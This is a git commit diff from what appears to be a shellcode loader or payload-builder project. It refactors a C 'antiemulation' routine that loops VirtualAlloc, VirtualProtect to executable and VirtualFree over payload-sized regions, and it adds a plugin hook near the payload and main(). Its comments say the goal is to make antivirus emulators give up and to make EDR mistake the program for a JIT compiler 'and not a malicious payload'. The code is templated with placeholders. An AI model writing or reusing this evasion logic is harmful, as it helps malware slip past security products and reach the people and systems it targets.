refactor: improve sirallocalot

2026-06-03 01:27:11 +00:00 · 2024-07-07 12:36:15 +01:00
parent b868c29c7d
commit 4bed8d1a95
4 changed files with 38 additions and 35 deletions
@@ -1,28 +1,31 @@


-#define SIR_ITERATION_COUNT {{SIR_ITERATION_COUNT}}
-#define SIR_ALLOC_COUNT {{SIR_ALLOC_COUNT}}
-
-#define SIR_SLEEP_TIME 200  // ms
-
-
 /* This will allocate SIR_ALLOC_COUNT RW memory regions, 
-     set them to RX, and free them 
+   set them to RX, and free them. 
+   And this SIR_ITERATION_COUNT times.
+   
+   SIR_ITERATION_COUNT: Single digits, around 5
+   SIR_ALLOC_COUNT:     Tripple digits, around 100

-    The idea is that the AV emulator will probably give up, either because
-    of used memory is above maximum, or amount of instructions, or 
-    number of API calls, or time. 
+   Memory   : SIR_ALLOC_COUNT * payload_length
+   Cycles   : SIR_ALLOC_COUNT * payload_length * SIR_ITERATION_COUNT
+   Time     : SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * payload_length * ?
+   API calls: SIR_ALLOC_COUNT * SIR_ITERATION_COUNT * 3

-    It hopefully also makes the EDR think this program is doing some
-    kind of interpreter or JIT compilation, and not a malicious payload.
+   The idea is that the AV emulator will probably give up, either because
+   of used memory is above maximum, or amount of instructions, or 
+   number of API calls, or time. 
+
+   It hopefully also makes the EDR think this program is doing some
+   kind of interpreter or JIT compilation, and not a malicious payload.
 */

 void antiemulation() {
-    void* allocs[SIR_ALLOC_COUNT];
+    void* allocs[{{SIR_ALLOC_COUNT}}];
    DWORD result;

-    for(int i=0; i<SIR_ITERATION_COUNT; i++) {
-        for(int n=0; n<SIR_ALLOC_COUNT; n++) {
+    for(int i=0; i<{{SIR_ITERATION_COUNT}}; i++) {
+        for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
            allocs[n] = VirtualAlloc(
                NULL, 
                {{PAYLOAD_LEN}}, 
@@ -37,33 +40,23 @@ void antiemulation() {
            }
        }

-        // Write something. 
-        /*for(int n=0; n<SIR_ALLOC_COUNT; n++) {
-            char *alloc = allocs[n];
-            alloc[0] = 0; // overwrite the first byte
-        }*/
-
-        for(int n=0; n<SIR_ALLOC_COUNT; n++) {
+        for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
            if (VirtualProtect(
                allocs[n], 
                {{PAYLOAD_LEN}}, 
                p_RX, 
                &result) == 0) 
            {
-                return 7;
+                return;
            }
        }

-        Sleep(SIR_SLEEP_TIME);
-
        BOOL bSuccess;
-        for(int n=0; n<SIR_ALLOC_COUNT; n++) {
+        for(int n=0; n<{{SIR_ALLOC_COUNT}}; n++) {
            bSuccess = VirtualFree(
                            allocs[n],
                            {{PAYLOAD_LEN}},
                            0x00008000); // MEM_RELEASE
        }
    }
-
-
 }
@@ -22,6 +22,8 @@ char *supermega_payload;

 {{plugin_executionguardrail}}

+{{plugin_virtualprotect}}
+

 int main()
 {